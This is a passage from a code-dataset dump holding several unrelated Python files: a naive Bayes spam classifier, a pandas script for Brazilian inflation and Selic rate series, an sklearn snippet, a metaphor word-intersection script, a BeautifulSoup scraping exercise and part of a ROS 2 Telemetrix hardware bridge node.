取并集\n vocabSet = vocabSet | set(document)\n return list(vocabSet)\n\n# 根据vocabList词汇表,将inputSet向量化,向量的每个元素为1或0\ndef setOfWords2Vec(vocabList, inputSet):\n returnVec = [0] * len(vocabList)\n for word in inputSet:\n if word in vocabList:\n returnVec[vocabList.index(word)] = 1\n else:\n print(\"the word: %s is not in my Vocabulary!\" % word)\n return returnVec\n\n# 函数说明:根据vocabList词汇表,构建词袋模型\ndef bagOfWord2Vec(vocabList, inputSet):\n returnVec = [0] * len(vocabList) # 创建一个其中所含元素都为0的向量\n for word 
in inputSet: # 遍历每个词条\n if word in vocabList: # 如果词条存在于词汇表中,则计数加一\n returnVec[vocabList.index(word)] += 1\n return returnVec\n\n# 函数说明:朴素贝叶斯分类器训练函数\n'''\nParameters:\n trainMatrix - 训练文档矩阵,即setOfWords2Vec返回的returnVec构成的矩阵\n trainCategory - 训练类别标签向量,即loadDataSet返回的classVec\nReturns:\n p0Vect - 侮辱类的条件概率数组\n p1Vect - 非侮辱类的条件概率数组\n pAbusive - 文档属于侮辱类的概率\n'''\ndef trainNB0(trainMatrix, trainCategory):\n # 计算训练的文档数目\n numTrainDocs = len(trainMatrix)\n # 计算每篇文档的词条数\n numWords = len(trainMatrix[0])\n # 文档属于侮辱类的概率\n pAbusive = sum(trainCategory)/float(numTrainDocs)\n # 创建numpy.ones数组,词条出现数初始化为1,拉普拉斯平滑\n p0Num = np.ones(numWords)\n p1Num = np.ones(numWords)\n # 分母初始化为2,拉普拉斯平滑\n p0Denom = 2.0\n p1Denom = 2.0\n\n for i in range(numTrainDocs):\n if trainCategory[i] == 1:\n # 统计属于侮辱类的条件概率所需的数据,即P(w0|1),P(w1|1),P(w2|1)···\n p1Num += trainMatrix[i]\n p1Denom += sum(trainMatrix[i])\n else:\n # 统计属于非侮辱类的条件概率所需的数据,即P(w0|0),P(w1|0),P(w2|0)···\n p0Num += trainMatrix[i]\n p0Denom += sum(trainMatrix[i])\n # 取对数,防止下溢出\n p1Vect = np.log(p1Num/p1Denom)\n p0Vect = np.log(p0Num/p0Denom)\n # 返回属于侮辱类的条件概率数组,属于非侮辱类的条件概率数组,文档属于侮辱类的概率\n return p0Vect, p1Vect, pAbusive\n\n\"\"\"\n函数说明:朴素贝叶斯分类器分类函数\n\nParameters:\n\tvec2Classify - 待分类的词条数组\n\tp0Vec - 非侮辱类的条件概率数组\n\tp1Vec -侮辱类的条件概率数组\n\tpClass1 - 文档属于侮辱类的概率\nReturns:\n\t0 - 属于非侮辱类\n\t1 - 属于侮辱类\n\"\"\"\ndef classifyNB(vec2Classify, p0Vec, p1Vec, pClass1):\n p1 = sum(vec2Classify * p1Vec) + np.log(pClass1) \t#对应元素相乘。logA * B = logA + logB,所以这里加上log(pClass1)\n p0 = sum(vec2Classify * p0Vec) + np.log(1.0 - pClass1)\n if p1 > p0:\n return 1\n else:\n return 0\n\n\n# 函数说明:测试朴素贝叶斯分类器\ndef spamTest():\n docList = []; classList = []; fullText = []\n # 遍历25个txt文件\n for i in range(1, 26):\n # 读取每个垃圾邮件,并字符串转换成字符串列表\n wordList = textParse(open('../dataset/spam/%d.txt' % i, 'r').read())\n docList.append(wordList)\n # 标记垃圾邮件,1表示垃圾文件\n classList.append(1)\n # 读取每个非垃圾邮件,并字符串转换成字符串列表\n wordList = textParse(open('D:\\learn\\python\\pythonSkill\\pythonBaseTrainning\\项目练手\\机器学习实战\\dataset\\ham\\%d.txt' % i, 'r').read())\n docList.append(wordList)\n # 标记非垃圾邮件,1表示垃圾文件\n classList.append(0)\n # 创建词汇表,不重复\n vocabList = createVocabList(docList)\n # print(vocabList)\n trainingSet = list(range(50))\n testSet = []\n # 从50个邮件中,随机挑选出40个作为训练集,10个做测试集\n for i in range(10):\n # 随机选取索索引值\n randIndex = int(random.uniform(0, len(trainingSet)))\n # 添加测试集的索引值\n testSet.append(trainingSet[randIndex])\n # 在训练集列表中删除添加到测试集的索引值\n del(trainingSet[randIndex])\n trainMat = []\n trainClasses = []\n # 创建训练集矩阵和训练集类别标签系向量\n for docIndex in trainingSet:\n # 将生成的词集模型添加到训练矩阵中\n trainMat.append(setOfWords2Vec(vocabList, docList[docIndex]))\n # 将类别添加到训练集类别标签系向量中\n trainClasses.append(classList[docIndex])\n # 训练朴素贝叶斯模型\n p0V, p1V, pSam = trainNB0(np.array(trainMat), np.array(trainClasses))\n # 错误分类计数\n errorCount = 0\n # 遍历测试集\n for docIndex in testSet:\n # 测试集的词集模型\n wordVector = setOfWords2Vec(vocabList, docList[docIndex])\n if classifyNB(np.array(wordVector), p0V, p1V, pSam) != classList[docIndex]:\n # 错误计数加1\n errorCount += 1\n print(\"分类错误的测试集:\",docList[docIndex])\n # 打印错误率\n print('错误率:%.2f%%' % (float(errorCount) / len(testSet) * 100))\n\nif __name__ == '__main__':\n spamTest()","repo_name":"yidaodashi/pythonSkills","sub_path":"pythonBaseTrainning/项目练手/机器学习实战/beiyes/beiyes_rubbish_email.py","file_name":"beiyes_rubbish_email.py","file_ext":"py","file_size_in_byte":7201,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27629445992","text":"# -*- coding: utf-8 
-*-\r\n\"\"\"\r\nCreated on Tue Dec 7 08:41:16 2021\r\n\r\n@author: 2104998693\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport seaborn as sns; sns.set()\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimport matplotlib\r\nmatplotlib.rcParams['figure.figsize'] = (16,8)\r\n\r\ndef consulta_bc(codigo_bcb):\r\n url = 'http://api.bcb.gov.br/dados/serie/bcdata.sgs.{}/dados?formato=json'.format(codigo_bcb)\r\n df = pd.read_json(url)\r\n df['data'] = pd.to_datetime(df['data'], dayfirst=True)\r\n df.set_index('data', inplace=True)\r\n return df\r\n\r\nipca = consulta_bc(433)\r\n\r\nigpm = consulta_bc(189)\r\n\r\nselic = consulta_bc(4390)\r\n\r\nipca_acumulado = np.cumprod((ipca/100) + 1)\r\n\r\nigpm_acumulado = np.cumprod((igpm/100) + 1)\r\n\r\nselic_acumulado = np.cumprod((selic/100) + 1)\r\nselic_acumulado.reset_index(level=0, inplace=True)\r\n\r\n\r\nfech_atual = pd.read_excel(r'C:\\Users\\2104998693\\Desktop\\Modelagem\\Consolidado Modelagem 20_12_v1.xlsx')\r\n\r\nfech_atual['MES_DATA_DISPENSA'] = pd.to_datetime(fech_atual['MES_DATA_DISPENSA'])\r\nfech_atual['MES_DISTRIBUICAO'] = pd.to_datetime(fech_atual['MES_DISTRIBUICAO'])\r\n\r\nfech_ipca_disp = pd.merge(fech_atual, ipca_acumulado, left_on = \"MES_DATA_DISPENSA\", right_on = \"data\", how = 'left')\r\n\r\nfech_ipca_disp_dist = pd.merge(fech_ipca_disp, ipca_acumulado, left_on = \"MES_DISTRIBUICAO\", right_on = \"data\", how = 'left')\r\n\r\n\r\nfech_ipca_selic = pd.merge(fech_ipca_disp_dist, selic_acumulado, left_on = \"MES_DATA_DISPENSA\", right_on = \"data\", how = 'left')\r\n\r\ntest = selic_acumulado.loc[selic_acumulado.data == \"2021/09/01\", \"valor\"]\r\n\r\ntest = test.reset_index()\r\n\r\nfech_ipca_selic['Selic Setembro'] = test['valor'][0]\r\n\r\nfech_ipca_selic.rename(\r\n columns=({'valor_x':'IPCA Dispensa', 'valor_y': 'IPCA Distribuição', 'valor':'Selic Dispensa'}), \r\n inplace=True,)\r\n\r\nfech_ipca_selic['Taxa IPCA'] = fech_ipca_selic['IPCA Distribuição'] / fech_ipca_selic['IPCA Dispensa']\r\n\r\nfech_ipca_selic['Taxa Selic'] = fech_ipca_selic['Selic Setembro'] / fech_ipca_selic['Selic Dispensa']\r\n\r\nfech_ipca_selic.to_excel(r'C:\\Users\\2104998693\\Desktop\\Modelagem\\TesteSelicIPCA.xlsx', sheet_name='Consolidado', index = False)\r\n\r\n","repo_name":"dchunz/Python","sub_path":"Series temporais.py","file_name":"Series temporais.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31796866627","text":"from sklearn.model_selection import train_test_split\n\ntrain_x, test_x, train_y, test_y = train_test_split(X, # Our features\n y, # Our target\n stratify=y, # Make sure that there are equal amounts of our target in train and test data\n random_state=seed # train_test_split splits data randomly - by passing our seed, we can get reproducible results\n )\n\nclf.fit(train_x, train_y)\nscore = clf.score(test_x, test_y)\nprint(f\"Accuracy: {score:.2%}\")\n","repo_name":"andersbogsnes/sklearn_tutorial","sub_path":"snippets/train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27135231060","text":"#War Metaphor Script\r\n#Kieffer Higgins\r\n# Make it more efficient later!\r\n#Imports\r\nimport os\r\nimport re\r\nfrom sys import argv\r\n#Let... 
argv[1] = BBC Climate Change List, argv[2] = War List, argv[3] = Intersection List\r\n#argv[4] = bbcIntersection #argv[5] = warintersection\r\n\r\n#///////////////////////////////////////////////////////////////////\r\n#functions for later use:\r\n#Saves a set that was made from a line of an article to file specified in argv[3]\r\ndef saveToIntersectionFile(line, fileName, outputFile, intersection ):\r\n #we had passed in a set but we can just save the line\r\n #lineString = ''.join(lineSet)\r\n intersectionString = ''.join(intersection)\r\n with open(outputFile, 'a', encoding = 'utf8') as file:\r\n try:\r\n file.write('Intersection: ' + intersectionString + '\\t Found in ' + fileName + \"\\t\" + line + '\\n')\r\n except:\r\n print(\"Could not save line \" + line + \"To Intersection File\")\r\n#Gets BBC List from file\r\ndef getBBCList():\r\n with open(argv[1], 'r') as file:\r\n bbcList = file.read().split(\"\\n\")\r\n return bbcList\r\n#Gets War List From File\r\ndef getWarList():\r\n with open(argv[2], 'r') as file:\r\n warList = file.read().split(\"\\n\")\r\n return warList\r\n#After searching for spaced words in our files we then change the spaced words in the bbc list to an underscore format\r\ndef fixBBCList():\r\n newList = []\r\n with open(argv[1], 'r') as file:\r\n bbcList = file.read().split(\"\\n\")\r\n for item in bbcList:\r\n if \" \" in item:\r\n\r\n newItem =item.replace(\" \", \"_\")\r\n\r\n newList.append(newItem)\r\n else:\r\n newList.append(item)\r\n #print(newList)\r\n return newList\r\n\r\n#/////////////////////////////////////////////////////////////////////////////\r\n\r\n# MAIN AREA\r\nprint(\"Starting Engines...\")\r\n#Let us get our BBC List and War List\r\nbbcList = getBBCList()\r\nwarList = getWarList()\r\n\r\n\r\n#Get all the files in genre folder (this script will be run in each folder)\r\nfiles = [file for file in os.listdir() if file.endswith(\".txt\")]\r\n\r\n# /////////////// REPLACE SPACES WITH UNDERSCORES //////////////////////////\r\n #!!!! 
There is an issue with this function where it still thinks it has to rename a new thing...but..it works for one run.\r\n#For each file in files\r\nfor file in files:\r\n    #This is a flag used for later\r\n    deleteFlag = 0\r\n    #Try to do the following\r\n    #try:\r\n    #Open the file\r\n    with open(file, 'r', encoding = 'utf8') as openedFile:\r\n        #We read in the file\r\n        readFile = openedFile.read()\r\n        #If there's a word in the file that is also in the BBC list and it contains a space...\r\n        #if (word in openedFile for word in bbcList) and \" \" in word:\r\n\r\n\r\n        #For each word in the BBC List (not the War List as it does not have any words containing a space)\r\n        for word in bbcList:\r\n            #We check if that word is also in our read in file and if there is a space in the word\r\n            #We could just check for the words with spaces in them...there might be a way more efficient way to do all of this\r\n            if (word in readFile) and \" \" in word:\r\n                #If the word is in the file and has a space in it,\r\n                #We need to replace the space in that word in that file.\r\n\r\n                oldWord = word\r\n                newWord = oldWord.replace(\" \", \"_\")\r\n\r\n                #Then we replace our old word with our new fixed up word, accumulating fixes in readFile\r\n                #(reassigning keeps earlier replacements instead of starting over from the raw file each time)\r\n                readFile = readFile.replace(oldWord, newWord)\r\n\r\n\r\n                #Let us create a new name for the files which we have replaced the spaces in\r\n                newFileName = \"[SPACE REPLACED]\" + file\r\n                #Now let's open a new file and write to it\r\n                with open(newFileName, 'w', encoding = 'utf8') as theFileToWriteto:\r\n                    #We write the changed underscore / space content to file\r\n                    theFileToWriteto.write(readFile)\r\n                #Now we must delete the old file\r\n                #Let's change this flag so we can use it later\r\n                deleteFlag = 1\r\n    #If we have marked a file for deletion\r\n    if deleteFlag == 1:\r\n        #Close it and kill it.\r\n        openedFile.close()\r\n        os.remove(file)\r\n\r\n\r\n\r\n\r\n    #If we can't do any of the above just move on and don't crash the program\r\n    #except:\r\n        #but make a note of it\r\n    #    print(\"Failed to open a file or replace something\")\r\n        #continue\r\n#Replace the spaces in the words in our BBCLIST\r\nbbcList = fixBBCList()\r\n\r\n# ////////////////////////////////////////////////////////////\r\n\r\n# //////////////////// CHECKING FOR INTERSECTION ///////////////////\r\n#Make BBC list and War List into sets\r\nbbcSet = set(bbcList)\r\nwarSet = set(warList)\r\n#For each sentence in each genre\r\n\r\n# We need to reestablish our file list since it has changed\r\nfiles = [file for file in os.listdir() if file.endswith(\".txt\")]\r\n#For each file in our list of files\r\nfor file in files:\r\n    #try:\r\n    #We open each file in our list of files\r\n    with open(file, 'r', encoding = 'utf8') as openedFile:\r\n        #Assigning the read in contents to \"text file\"\r\n        textFile = openedFile.read()\r\n        #For each line (as determined by \\n char) in textFile,\r\n        for line in textFile.split('\\n'):\r\n            #Make the sentence / line a list\r\n            lineList = line.split()\r\n            #then make sentence / line a set\r\n            lineSet = set(lineList)\r\n            #We now perform checks as to whether or not there is an intersection of sets:\r\n\r\n            #If a set of a line has an intersection with BBC SET:\r\n            if (lineSet.intersection(bbcSet)):\r\n                #Create a list of the intersecting values\r\n                bbcIntersectionList = list(lineSet.intersection(bbcSet))\r\n                #Save this line, filename and intersection to specified file (argv4)\r\n                saveToIntersectionFile(line, file, argv[4], bbcIntersectionList)\r\n            #If a set of a line has an intersection with WAR SET:\r\n            
if(lineSet.intersection(warSet)):\r\n                #Create a list of the intersecting values\r\n                warIntersectionList = list(lineSet.intersection(warSet))\r\n                #Save this line, filename and intersection to specified file (argv5)\r\n                saveToIntersectionFile(line,file, argv[5], warIntersectionList)\r\n\r\n\r\n            #If intersections are had with both: (IMPORTANT PART)\r\n            if (lineSet.intersection(bbcSet) and lineSet.intersection(warSet)):\r\n\r\n                #Create a list of the intersecting words with bbcSet\r\n                bbcListIntersection = list(lineSet.intersection(bbcSet))\r\n                #Create a list of the intersecting words with warSet\r\n                warListIntersection = list(lineSet.intersection(warSet))\r\n                #Create a new empty list\r\n                intersection = []\r\n                #Add the two lists to intersection:\r\n                intersection.append(\"[\") #For ease of readability\r\n                intersection.extend(bbcListIntersection)\r\n                intersection.append(\"\\t\") #For ease of readability\r\n                intersection.extend(warListIntersection)\r\n                intersection.append(\"]\") #For ease of readability\r\n\r\n                #Save this line, filename and intersection to specified file (argv3)\r\n                saveToIntersectionFile(line, file, argv[3], intersection)\r\nprint(\"Morality Deconstructed\")\r\n\r\n    #except:\r\n        #print(\"Probably couldn't open a file or map a character\")\r\n        #continue\r\n","repo_name":"kiefferjh/SimpleMetaphorDetectionScripts","sub_path":"metaphor.py","file_name":"metaphor.py","file_ext":"py","file_size_in_byte":7827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72390588968","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\n\n# if has Chinese, apply decode()\nhtml = urlopen(\"https://nba.hupu.com/wiki/%E7%A7%91%E6%AF%94-%E5%B8%83%E8%8E%B1%E6%81%A9%E7%89%B9\").read().decode('utf-8')\n#print(html)\n\nsoup=BeautifulSoup(html,features='lxml')\n# print('\\n----------------------------\\n',soup.h1)\n\n# print('\\n------------------\\n',soup.p)\n\n# print('\\n---------------------------\\n',soup.body)\n\n\nall_href=soup.find_all('a')\nprint('\\n----------------------------\\n',all_href)\nall_href=[l['href'] for l in all_href]\n#all_href = [l['href'] for l in all_href]\nprint('\\n11111111111111111111111111111111\\n',all_href)\n\n## practicing on my own\n\nall_link=soup.find_all('link')\nprint('\\n-==========\\n',all_link)\nall_link=[m['href'] for m in all_link]# dict-style access href='*****' pulls out each tag's href value\nprint('\\n0000000000000000000000000\\n',all_link)","repo_name":"Flintstone-xu/crawler","sub_path":"spider_practise_02_Beautiful.py","file_name":"spider_practise_02_Beautiful.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22982489765","text":"from datetime import datetime\nfrom typing import Tuple\n\nimport rclpy.node\nimport rclpy.service\nimport rclpy.time\nfrom builtin_interfaces.msg import Time as TimeMsg\nfrom std_msgs.msg import Header as HeaderMsg\n\nfrom oasis_drivers.ros.ros_translator import RosTranslator\nfrom oasis_drivers.telemetrix.telemetrix_bridge import TelemetrixBridge\nfrom oasis_drivers.telemetrix.telemetrix_callback import TelemetrixCallback\nfrom oasis_drivers.telemetrix.telemetrix_types import AnalogMode\nfrom oasis_drivers.telemetrix.telemetrix_types import DigitalMode\nfrom oasis_msgs.msg import AnalogReading as AnalogReadingMsg\nfrom oasis_msgs.msg import AVRConstants as AVRConstantsMsg\nfrom oasis_msgs.msg import CPUFanSpeed as CPUFanSpeedMsg\nfrom oasis_msgs.msg import DigitalReading as DigitalReadingMsg\nfrom 
oasis_msgs.msg import MCUMemory as MCUMemoryMsg\nfrom oasis_msgs.msg import MCUString as MCUStringMsg\nfrom oasis_msgs.srv import AnalogRead as AnalogReadSvc\nfrom oasis_msgs.srv import DigitalRead as DigitalReadSvc\nfrom oasis_msgs.srv import DigitalWrite as DigitalWriteSvc\nfrom oasis_msgs.srv import PWMWrite as PWMWriteSvc\nfrom oasis_msgs.srv import ReportMCUMemory as ReportMCUMemorySvc\nfrom oasis_msgs.srv import ServoWrite as ServoWriteSvc\nfrom oasis_msgs.srv import SetAnalogMode as SetAnalogModeSvc\nfrom oasis_msgs.srv import SetDigitalMode as SetDigitalModeSvc\nfrom oasis_msgs.srv import SetSamplingInterval as SetSamplingIntervalSvc\n\n\n################################################################################\n# ROS parameters\n################################################################################\n\n\nNODE_NAME = \"telemetrix_bridge\"\n\n# ROS parameters\nPARAM_COM_PORT = \"com_port\"\n\n# ROS topics\nANALOG_READING_TOPIC = \"analog_reading\"\nCPU_FAN_SPEED_TOPIC = \"cpu_fan_speed\"\nDIGITAL_READING_TOPIC = \"digital_reading\"\nMCU_MEMORY_TOPIC = \"mcu_memory\"\nMCU_STRING_TOPIC = \"mcu_string\"\n\n# ROS services\nANALOG_READ_SERVICE = \"analog_read\"\nCPU_FAN_WRITE_SERVICE = \"cpu_fan_write\"\nDIGITAL_READ_SERVICE = \"digital_read\"\nDIGITAL_WRITE_SERVICE = \"digital_write\"\nPWM_WRITE_SERVICE = \"pwm_write\"\nREPORT_MCU_MEMORY_SERVICE = \"report_mcu_memory\"\nSERVO_WRITE_SERVICE = \"servo_write\"\nSET_ANALOG_MODE_SERVICE = \"set_analog_mode\"\nSET_CPU_FAN_SAMPLING_INTERVAL_SERVICE = \"set_cpu_fan_sampling_interval\"\nSET_DIGITAL_MODE_SERVICE = \"set_digital_mode\"\nSET_SAMPLING_INTERVAL_SERVICE = \"set_sampling_interval\"\n\n\n################################################################################\n# Telemetrix parameters\n################################################################################\n\n\nDEFAULT_COM_PORT = \"/dev/ttyACM0\"\n\n\n################################################################################\n# ROS node\n################################################################################\n\n\nclass TelemetrixBridgeNode(rclpy.node.Node, TelemetrixCallback):\n def __init__(self) -> None:\n \"\"\"\n Initialize resources.\n \"\"\"\n # Initialize rclpy.node.NODE\n super().__init__(NODE_NAME)\n self.declare_parameter(PARAM_COM_PORT, DEFAULT_COM_PORT)\n\n # Initialize members\n com_port: str = str(self.get_parameter(PARAM_COM_PORT).value)\n self._bridge = TelemetrixBridge(self, com_port)\n\n # Reliable listener QOS profile for subscribers\n qos_profile: rclpy.qos.QoSPresetProfile = (\n rclpy.qos.QoSPresetProfiles.SYSTEM_DEFAULT.value\n )\n\n # Publishers\n self._analog_reading_pub: rclpy.publisher.Publisher = self.create_publisher(\n msg_type=AnalogReadingMsg,\n topic=ANALOG_READING_TOPIC,\n qos_profile=qos_profile,\n )\n self._cpu_fan_speed_pub: rclpy.publisher.Publisher = self.create_publisher(\n msg_type=CPUFanSpeedMsg,\n topic=CPU_FAN_SPEED_TOPIC,\n qos_profile=qos_profile,\n )\n self._digital_reading_pub: rclpy.publisher.Publisher = self.create_publisher(\n msg_type=DigitalReadingMsg,\n topic=DIGITAL_READING_TOPIC,\n qos_profile=qos_profile,\n )\n self._mcu_memory_pub: rclpy.publisher.Publisher = self.create_publisher(\n msg_type=MCUMemoryMsg,\n topic=MCU_MEMORY_TOPIC,\n qos_profile=qos_profile,\n )\n self._mcu_string_pub: rclpy.publisher.Publisher = self.create_publisher(\n msg_type=MCUStringMsg,\n topic=MCU_STRING_TOPIC,\n qos_profile=qos_profile,\n )\n\n # Once the publishers are set up, start the bridge\n 
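# publishers are created first because the bridge's callbacks publish to them\n        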
self._bridge.initialize()\n\n # Once the bridge is started, advertise the services\n self._analog_read_service: rclpy.service.Service = self.create_service(\n srv_type=AnalogReadSvc,\n srv_name=ANALOG_READ_SERVICE,\n callback=self._handle_analog_read,\n )\n self._cpu_fan_write_service: rclpy.service.Service = self.create_service(\n srv_type=PWMWriteSvc,\n srv_name=CPU_FAN_WRITE_SERVICE,\n callback=self._handle_cpu_fan_write,\n )\n self._digital_read_service: rclpy.service.Service = self.create_service(\n srv_type=DigitalReadSvc,\n srv_name=DIGITAL_READ_SERVICE,\n callback=self._handle_digital_read,\n )\n self._digital_write_service: rclpy.service.Service = self.create_service(\n srv_type=DigitalWriteSvc,\n srv_name=DIGITAL_WRITE_SERVICE,\n callback=self._handle_digital_write,\n )\n self._pwm_write_service: rclpy.service.Service = self.create_service(\n srv_type=PWMWriteSvc,\n srv_name=PWM_WRITE_SERVICE,\n callback=self._handle_pwm_write,\n )\n self._report_mcu_memory_service: rclpy.service.Service = self.create_service(\n srv_type=ReportMCUMemorySvc,\n srv_name=REPORT_MCU_MEMORY_SERVICE,\n callback=self._handle_report_mcu_memory,\n )\n self._servo_write_service: rclpy.service.Service = self.create_service(\n srv_type=ServoWriteSvc,\n srv_name=SERVO_WRITE_SERVICE,\n callback=self._handle_servo_write,\n )\n self._set_analog_mode_service: rclpy.service.Service = self.create_service(\n srv_type=SetAnalogModeSvc,\n srv_name=SET_ANALOG_MODE_SERVICE,\n callback=self._handle_set_analog_mode,\n )\n self._set_cpu_fan_sampling_interval_service: rclpy.service.Service = (\n self.create_service(\n srv_type=SetSamplingIntervalSvc,\n srv_name=SET_CPU_FAN_SAMPLING_INTERVAL_SERVICE,\n callback=self._handle_set_cpu_fan_sampling_interval,\n )\n )\n self._set_digital_mode_service: rclpy.service.Service = self.create_service(\n srv_type=SetDigitalModeSvc,\n srv_name=SET_DIGITAL_MODE_SERVICE,\n callback=self._handle_set_digital_mode,\n )\n self._set_sampling_interval_service: rclpy.service.Service = (\n self.create_service(\n srv_type=SetSamplingIntervalSvc,\n srv_name=SET_SAMPLING_INTERVAL_SERVICE,\n callback=self._handle_set_sampling_interval,\n )\n )\n\n self.get_logger().info(\"Telemetrix bridge initialized\")\n\n def stop(self) -> None:\n \"\"\"Stop the bridge and cleanup ROS resources\"\"\"\n self._bridge.deinitialize()\n\n self.get_logger().info(\"Telemetrix bridge deinitialized\")\n\n # Destroy the node explicitly. 
Problems can occur when the garbage\n # collector automatically destroys the node object after ROS has\n # shut down.\n self.destroy_node()\n\n def on_analog_reading(\n self,\n timestamp: datetime,\n analog_pin: int,\n analog_value: float,\n reference_voltage: float,\n ) -> None:\n \"\"\"Implement TelemetrixCallback\"\"\"\n msg: AnalogReadingMsg = AnalogReadingMsg()\n\n # Timestamp in ROS header\n header = HeaderMsg()\n header.stamp = RosTranslator.convert_timestamp(timestamp)\n header.frame_id = \"\" # TODO\n\n msg.header = header\n msg.analog_pin = analog_pin\n msg.reference_voltage = reference_voltage\n msg.analog_value = analog_value\n\n self._analog_reading_pub.publish(msg)\n\n def on_cpu_fan_rpm(self, timestamp: datetime, digital_pin: int, rpm: int) -> None:\n \"\"\"Implement TelemetrixCallback\"\"\"\n msg: CPUFanSpeedMsg = CPUFanSpeedMsg()\n\n # Timestamp in ROS header\n header = HeaderMsg()\n header.stamp = RosTranslator.convert_timestamp(timestamp)\n header.frame_id = \"\" # TODO\n\n msg.header = header\n msg.digital_pin = digital_pin\n msg.fan_speed_rpm = float(rpm)\n\n self._cpu_fan_speed_pub.publish(msg)\n\n def on_digital_reading(\n self, timestamp: datetime, digital_pin: int, digital_value: bool\n ) -> None:\n \"\"\"Implement TelemetrixCallback\"\"\"\n msg: DigitalReadingMsg = DigitalReadingMsg()\n\n # Timestamp in ROS header\n header = HeaderMsg()\n header.stamp = RosTranslator.convert_timestamp(timestamp)\n header.frame_id = \"\" # TODO\n\n msg.header = header\n msg.digital_pin = digital_pin\n msg.digital_value = (\n AVRConstantsMsg.HIGH if digital_value else AVRConstantsMsg.LOW\n )\n\n self._digital_reading_pub.publish(msg)\n\n def on_memory_data(\n self,\n total_ram: int,\n static_data_size: int,\n heap_size: int,\n stack_size: int,\n free_ram: int,\n free_heap: int,\n ) -> None:\n \"\"\"Implement TelemetrixCallback\"\"\"\n msg: MCUMemoryMsg = MCUMemoryMsg()\n\n # Timestamp in ROS header\n header = HeaderMsg()\n header.stamp = self._get_timestamp()\n header.frame_id = \"\" # TODO\n\n msg.header = header\n msg.total_ram = total_ram\n msg.static_data_size = static_data_size\n msg.heap_size = heap_size\n msg.stack_size = stack_size\n msg.free_ram = free_ram\n msg.free_heap = free_heap\n\n self._mcu_memory_pub.publish(msg)\n\n def on_string_data(self, data: str) -> None:\n \"\"\"Implement TelemetrixCallback\"\"\"\n msg: MCUStringMsg = MCUStringMsg()\n\n # Timestamp in ROS header\n header = HeaderMsg()\n header.stamp = self._get_timestamp()\n header.frame_id = \"\" # TODO\n\n msg.header = header\n msg.message = data\n\n self._mcu_string_pub.publish(msg)\n\n # Debug logging\n self.get_logger().info(data)\n\n def _handle_analog_read(\n self, request: AnalogReadSvc.Request, response: AnalogReadSvc.Response\n ) -> AnalogReadSvc.Response:\n \"\"\"Handle ROS 2 analog pin reads\"\"\"\n # Translate parameters\n analog_pin: int = request.analog_pin\n\n # Debug logging\n self.get_logger().info(f\"Reading value for analog pin {analog_pin}\")\n\n # Perform service\n result: Tuple[float, float, datetime] = self._bridge.analog_read(analog_pin)\n\n # Translate result\n response.stamp = RosTranslator.convert_timestamp(result[2])\n response.reference_voltage = float(result[1])\n response.analog_value = float(result[0])\n\n return response\n\n def _handle_cpu_fan_write(\n self, request: PWMWriteSvc.Request, response: PWMWriteSvc.Response\n ) -> PWMWriteSvc.Response:\n \"\"\"Handle ROS 2 CPU fan PWM writes\"\"\"\n # Translate parameters\n digital_pin: int = request.digital_pin\n duty_cycle: 
float = request.duty_cycle\n\n # Debug logging\n self.get_logger().info(\n f\"Setting CPU fan on pin {digital_pin} to duty cycle {duty_cycle}\"\n )\n\n # Perform service\n self._bridge.cpu_fan_write(digital_pin, duty_cycle)\n\n return response\n\n def _handle_digital_read(\n self, request: DigitalReadSvc.Request, response: DigitalReadSvc.Response\n ) -> DigitalReadSvc.Response:\n \"\"\"Handle ROS 2 digital pin reads\"\"\"\n # Translate parameters\n digital_pin: int = request.digital_pin\n\n # Debug logging\n self.get_logger().info(f\"Reading value for digital pin {digital_pin}\")\n\n # Perform service\n result: Tuple[bool, datetime] = self._bridge.digital_read(digital_pin)\n\n # Translate result\n response.stamp = RosTranslator.convert_timestamp(result[1])\n response.value = AVRConstantsMsg.HIGH if result[0] else AVRConstantsMsg.LOW\n\n return response\n\n def _handle_digital_write(\n self, request: DigitalWriteSvc.Request, response: DigitalWriteSvc.Response\n ) -> DigitalWriteSvc.Response:\n \"\"\"Handle ROS 2 digital pin writes\"\"\"\n # Translate parameters\n digital_pin: int = request.digital_pin\n digital_value: bool = request.digital_value == AVRConstantsMsg.HIGH\n\n # Debug logging\n self.get_logger().info(\n f\"Setting digital pin {digital_pin} value to {'HIGH' if digital_value else 'LOW'}\"\n )\n\n # Perform service\n self._bridge.digital_write(digital_pin, digital_value)\n\n return response\n\n def _handle_pwm_write(\n self, request: PWMWriteSvc.Request, response: PWMWriteSvc.Response\n ) -> PWMWriteSvc.Response:\n \"\"\"Handle ROS 2 PWM pin writes\"\"\"\n # Translate parameters\n digital_pin: int = request.digital_pin\n duty_cycle: float = request.duty_cycle\n\n # Debug logging\n self.get_logger().info(\n f\"Setting PWM on pin {digital_pin} to duty cycle {duty_cycle}\"\n )\n\n # Perform service\n self._bridge.pwm_write(digital_pin, duty_cycle)\n\n return response\n\n def _handle_report_mcu_memory(\n self, request: ReportMCUMemorySvc.Request, response: ReportMCUMemorySvc.Response\n ) -> ReportMCUMemorySvc.Response:\n \"\"\"Handle request to enable/disable MCU memory reporting\"\"\"\n # Translate parameters\n reporting_period_ms: int = request.reporting_period_ms\n\n # Debug logging\n if reporting_period_ms != 0:\n self.get_logger().info(f\"Reporting MCU memory at {reporting_period_ms}ms\")\n else:\n self.get_logger().info(\"Disabling MCU memory reporting\")\n\n # Perform service\n self._bridge.set_memory_reporting_interval(reporting_period_ms)\n\n return response\n\n def _handle_servo_write(\n self, request: ServoWriteSvc.Request, response: ServoWriteSvc.Response\n ) -> ServoWriteSvc.Response:\n \"\"\"Handle ROS 2 servo pin writes\"\"\"\n # Translate parameters\n digital_pin: int = request.digital_pin\n position: float = request.position\n\n # Debug logging\n self.get_logger().info(\n f\"Setting servo on pin {digital_pin} to position {position}\"\n )\n\n # Perform service\n 